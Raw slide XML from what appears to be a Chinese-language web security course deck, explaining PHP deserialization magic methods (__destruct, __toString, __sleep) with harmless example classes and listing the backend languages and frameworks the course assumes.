                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C</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1"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__destruct</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1"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	echo</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The object is destructed.</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1"/>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r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="24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292323704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反序列化</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77237"/>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魔术方法（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07A97704-D867-254F-93A0-2D9950937026}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="1737360"/>
            <a:ext cx="9083040" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>_toString</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方法在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>打印</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>对象时</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>调用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88461307-3068-EB49-B64D-9F2C50966F2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="2749957"/>
            <a:ext cx="6096000" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C</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1"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__toString</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1"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	return</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This is C</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1"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans"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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389123973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4720" y="233680"/>
            <a:ext cx="5367020" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>所需知识</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CE3915F-2A63-1743-A167-096F6DE68D95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1358900" y="2059615"/>
            <a:ext cx="8803640" cy="3901837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>： </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>官方文档</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>： </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>廖雪峰</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>教程（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>www.liaoxuefeng.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>），</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>官方文档</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>框架：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Flask</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Tornado</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Django</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>框架： </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Laravel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Yii</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>ThinkPHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Go</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>框架： </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>beego</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DC65920-AE23-F743-BEB7-15325996284E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716280" y="1005840"/>
            <a:ext cx="5044440" cy="681725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>三</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>后</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68175891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反序列化</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魔术方法（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07A97704-D867-254F-93A0-2D9950937026}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="1737360"/>
            <a:ext cx="9083040" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>__sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方法在对象</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>时</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>调用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA660262-79FE-F849-8D24-F0A7CF281172}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="2732038"/>
            <a:ext cx="6096000" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C</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1"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__sleep</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1"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	echo</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serialized</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1"/>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c</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
